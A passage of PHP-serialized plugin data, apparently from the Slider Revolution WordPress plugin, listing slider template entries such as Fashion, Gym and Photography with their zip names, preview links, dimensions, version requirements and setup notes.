13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:4;a:22:{s:2:\"id\";s:1:\"5\";s:5:\"title\";s:7:\"Fashion\";s:5:\"alias\";s:7:\"fashion\";s:3:\"zip\";s:11:\"fashion.zip\";s:3:\"uid\";s:32:\"4f4b914d6db35e19101ff003c4e7ea3a\";s:3:\"img\";s:18:\"fashion/slider.jpg\";s:7:\"preview\";s:65:\"http://revolution.themepunch.com/wordpress-one-page-slider-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:183:\"  <span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or bullets.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:5;a:22:{s:2:\"id\";s:1:\"6\";s:5:\"title\";s:14:\"Flickr Gallery\";s:5:\"alias\";s:14:\"flickr-gallery\";s:3:\"zip\";s:18:\"flickr-gallery.zip\";s:3:\"uid\";s:32:\"ad85cfac7acfa678e6a1b8febfee51ed\";s:3:\"img\";s:25:\"flickr-gallery/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-flickr-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"640\";s:11:\"description\";s:173:\" <span class=\"ttm_content\"> This slider is automatically populated by a Flickr stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:413:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Flickr Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:6;a:22:{s:2:\"id\";s:1:\"7\";s:5:\"title\";s:3:\"Gym\";s:5:\"alias\";s:3:\"gym\";s:3:\"zip\";s:7:\"gym.zip\";s:3:\"uid\";s:32:\"e4d81f13f96fb9bc905f4ad89615032b\";s:3:\"img\";s:14:\"gym/slider.jpg\";s:7:\"preview\";s:59:\"http://revolution.themepunch.com/one-page-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:189:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the slider menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:7;a:22:{s:2:\"id\";s:1:\"8\";s:5:\"title\";s:18:\"Highlight Carousel\";s:5:\"alias\";s:18:\"highlight-carousel\";s:3:\"zip\";s:22:\"highlight-carousel.zip\";s:3:\"uid\";s:32:\"ada52163f723a942f782351fa0396b3d\";s:3:\"img\";s:29:\"highlight-carousel/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-swipe-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"720\";s:11:\"description\";s:138:\"  <span class=\"ttm_content\">A swipe-controlled carousel with an additional tab-based navigation.</span>\r\n<span class=\"ttm_space\"></span>\r\n\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:8;a:22:{s:2:\"id\";s:1:\"9\";s:5:\"title\";s:18:\"Highlight Showcase\";s:5:\"alias\";s:18:\"highlight-showcase\";s:3:\"zip\";s:22:\"highlight-showcase.zip\";s:3:\"uid\";s:32:\"2bfe0bd410fb48fec9d942eab1e21530\";s:3:\"img\";s:29:\"highlight-showcase/slider.jpg\";s:7:\"preview\";s:62:\"http://revolution.themepunch.com/wordpress-parallax-slideshow/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"720\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">A tab-based navigation, a slideshow timer and cool animations make this slider interesting!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:9;a:22:{s:2:\"id\";s:2:\"10\";s:5:\"title\";s:10:\"Image Hero\";s:5:\"alias\";s:10:\"image-hero\";s:3:\"zip\";s:13:\"imagehero.zip\";s:3:\"uid\";s:32:\"7db18781d44f2adc28c962440894aac1\";s:3:\"img\";s:20:\"imagehero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-hero-image/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:121:\"<span class=\"ttm_content\">A commonly used full-width image hero block with texts.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:10;a:22:{s:2:\"id\";s:2:\"11\";s:5:\"title\";s:17:\"Instagram Gallery\";s:5:\"alias\";s:13:\"insta-gallery\";s:3:\"zip\";s:17:\"insta-gallery.zip\";s:3:\"uid\";s:32:\"711732b0d42ec2b57818a2b9b1d86cba\";s:3:\"img\";s:24:\"insta-gallery/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-instagram-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"640\";s:6:\"height\";s:3:\"640\";s:11:\"description\";s:174:\"<span class=\"ttm_content\">This slider is automatically populated by a Instagram stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:416:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Instagram Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:11;a:22:{s:2:\"id\";s:2:\"12\";s:5:\"title\";s:21:\"Levano Restaurant Bar\";s:5:\"alias\";s:19:\"levanorestaurantbar\";s:3:\"zip\";s:23:\"levanorestaurantbar.zip\";s:3:\"uid\";s:32:\"4178f837db67d1b2eb6cb5840bbd0b42\";s:3:\"img\";s:30:\"levanorestaurantbar/slider.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/wordpress-front-page-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or bullets.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:12;a:22:{s:2:\"id\";s:2:\"13\";s:5:\"title\";s:19:\"Main Feature Slider\";s:5:\"alias\";s:11:\"mainfeature\";s:3:\"zip\";s:15:\"mainfeature.zip\";s:3:\"uid\";s:32:\"1e002a3230ab00095bedc6f60393ee7f\";s:3:\"img\";s:22:\"mainfeature/slider.jpg\";s:7:\"preview\";s:33:\"http://revolution.themepunch.com/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"750\";s:11:\"description\";s:127:\" <span class=\"ttm_content\">A slightly stripped down version of the main preview slider.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:13;a:22:{s:2:\"id\";s:2:\"14\";s:5:\"title\";s:17:\"Media Gallery Two\";s:5:\"alias\";s:17:\"media-gallery-two\";s:3:\"zip\";s:21:\"media-gallery-two.zip\";s:3:\"uid\";s:32:\"d002f1b1b55805f9322c264c5504ba5a\";s:3:\"img\";s:28:\"media-gallery-two/slider.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/wordpress-media-gallery-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:6:\"6.2.22\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"692\";s:11:\"description\";s:127:\"<span class=\"ttm_content\">A media gallery example with Vimeo, HTML5 and Youtube videos.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change media and titles.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:14;a:22:{s:2:\"id\";s:2:\"15\";s:5:\"title\";s:23:\"Media Carousel Autoplay\";s:5:\"alias\";s:23:\"media-carousel-autoplay\";s:3:\"zip\";s:27:\"media-carousel-autoplay.zip\";s:3:\"uid\";s:32:\"393d7875b1cc9d933378b35e4f645d76\";s:3:\"img\";s:34:\"media-carousel-autoplay/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-media-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"720\";s:6:\"height\";s:3:\"405\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">A media carousel with \"autoplay\" activated. Swipe or click tabs to navigate the slider.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:289:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change media and caption texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:15;a:22:{s:2:\"id\";s:2:\"16\";s:5:\"title\";s:21:\"News Background Video\";s:5:\"alias\";s:21:\"news-background-video\";s:3:\"zip\";s:17:\"news-bg-video.zip\";s:3:\"uid\";s:32:\"a0efe44ac3af0f958b3f84c816a08272\";s:3:\"img\";s:24:\"news-bg-video/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-content-blocks/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A hero block with HTML5 background video that plays when entering the screen.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:16;a:22:{s:2:\"id\";s:2:\"17\";s:5:\"title\";s:12:\"News Gallery\";s:5:\"alias\";s:12:\"news-gallery\";s:3:\"zip\";s:16:\"news-gallery.zip\";s:3:\"uid\";s:32:\"3a069c3b286dbb9ee435563f747e3300\";s:3:\"img\";s:23:\"news-gallery/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-news-rotator/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:131:\"<span class=\"ttm_content\">A news gallery slideshow with tab navigation. Great for any blog!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:17;a:22:{s:2:\"id\";s:2:\"18\";s:5:\"title\";s:23:\"News Gallery Post Based\";s:5:\"alias\";s:23:\"news-gallery-post-based\";s:3:\"zip\";s:27:\"news-gallery-post-based.zip\";s:3:\"uid\";s:32:\"32fe05b1039c29ab9420bfd15aec5488\";s:3:\"img\";s:34:\"news-gallery-post-based/slider.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-post-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:125:\"<span class=\"ttm_content\"> This slider is automatically populated by WordPress posts.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:423:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Post-Based Slider\"</a>. Make sure to select the post type you want to display in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:18;a:22:{s:2:\"id\";s:2:\"19\";s:5:\"title\";s:9:\"News Hero\";s:5:\"alias\";s:9:\"news-hero\";s:3:\"zip\";s:13:\"news-hero.zip\";s:3:\"uid\";s:32:\"96a0385538a17c8c81ed8175740f70ea\";s:3:\"img\";s:20:\"news-hero/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-content-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:107:\"<span class=\"ttm_content\">A image hero block with ken burns effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:19;a:22:{s:2:\"id\";s:2:\"20\";s:5:\"title\";s:10:\"News Video\";s:5:\"alias\";s:10:\"news-video\";s:3:\"zip\";s:14:\"news-video.zip\";s:3:\"uid\";s:32:\"f901e9e16e0363248156c2209eb584e9\";s:3:\"img\";s:21:\"news-video/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-content-blocks/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:128:\"<span class=\"ttm_content\">A Vimeo background video hero block with play / pause buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:289:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the video and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:20;a:22:{s:2:\"id\";s:2:\"21\";s:5:\"title\";s:15:\"Newsletter Hero\";s:5:\"alias\";s:15:\"newsletter-hero\";s:3:\"zip\";s:19:\"newsletter-hero.zip\";s:3:\"uid\";s:32:\"6290a9864d8c4c6311784586ed1cc5fe\";s:3:\"img\";s:26:\"newsletter-hero/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-newsletter-signup/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:137:\"<span class=\"ttm_content\">This hero block uses a custom styled Mailchimp newsletter signup field.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:435:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image, texts, and <a href=\"https://www.themepunch.com/faq/how-to-setup-mailchimp-for-the-newsletter-hero-template/\" target=\"_blank\">Mailchimp code</a>.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:21;a:22:{s:2:\"id\";s:2:\"22\";s:5:\"title\";s:11:\"Not Generic\";s:5:\"alias\";s:10:\"notgeneric\";s:3:\"zip\";s:14:\"notgeneric.zip\";s:3:\"uid\";s:32:\"9d87ba95e02210a9f82387add2ceadf9\";s:3:\"img\";s:21:\"notgeneric/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-fullscreen-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">A full-screen slider with a layer based navigation and sleek content elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:22;a:22:{s:2:\"id\";s:2:\"23\";s:5:\"title\";s:11:\"Photography\";s:5:\"alias\";s:11:\"photography\";s:3:\"zip\";s:15:\"photography.zip\";s:3:\"uid\";s:32:\"1b2072547afb75e49f33b016751ed360\";s:3:\"img\";s:22:\"photography/slider.jpg\";s:7:\"preview\";s:62:\"http://revolution.themepunch.com/wordpress-photography-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:194:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:23;a:22:{s:2:\"id\";s:2:\"24\";s:5:\"title\";s:20:\"Photography Carousel\";s:5:\"alias\";s:20:\"photography-carousel\";s:3:\"zip\";s:24:\"photography-carousel.zip\";s:3:\"uid\";s:32:\"9a84b859ba23dc49ba8784e3a86545fa\";s:3:\"img\";s:31:\"photography-carousel/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-photo-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">A front-page carousel that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a 